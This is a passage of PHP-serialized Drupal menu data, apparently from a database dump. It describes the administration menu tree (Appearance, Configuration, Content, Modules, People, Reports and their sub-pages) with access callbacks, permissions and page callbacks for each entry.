ght\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:14:{i:42;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"42\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/fields\";s:11:\"router_path\";s:20:\"admin/reports/fields\";s:10:\"link_title\";s:10:\"Field list\";s:7:\"options\";s:89:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:39:\"Overview of fields on all entity types.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"42\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer content types\";}\";s:13:\"page_callback\";s:20:\"field_ui_fields_list\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/fields\";s:5:\"title\";s:10:\"Field list\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:39:\"Overview of fields on all entity types.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:50;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"50\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/dblog\";s:11:\"router_path\";s:19:\"admin/reports/dblog\";s:10:\"link_title\";s:19:\"Recent log messages\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View events that have recently been logged.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"50\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:14:\"dblog_overview\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/dblog\";s:5:\"title\";s:19:\"Recent log messages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View events that have recently been logged.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:55;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"55\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/status\";s:11:\"router_path\";s:20:\"admin/reports/status\";s:10:\"link_title\";s:13:\"Status report\";s:7:\"options\";s:124:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-60\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"55\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"system_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/status\";s:5:\"title\";s:13:\"Status report\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:58;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"58\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:27:\"admin/reports/access-denied\";s:11:\"router_path\";s:27:\"admin/reports/access-denied\";s:10:\"link_title\";s:26:\"Top \'access denied\' errors\";s:7:\"options\";s:85:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:35:\"View \'access denied\' errors (403s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"58\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:31:\"a:1:{i:0;s:13:\"access denied\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:27:\"admin/reports/access-denied\";s:5:\"title\";s:26:\"Top \'access denied\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:35:\"View \'access denied\' errors (403s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:59;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"59\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:28:\"admin/reports/page-not-found\";s:11:\"router_path\";s:28:\"admin/reports/page-not-found\";s:10:\"link_title\";s:27:\"Top \'page not found\' errors\";s:7:\"options\";s:86:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"View \'page not found\' errors (404s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"59\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"page not found\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:28:\"admin/reports/page-not-found\";s:5:\"title\";s:27:\"Top \'page not found\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:36:\"View \'page not found\' errors 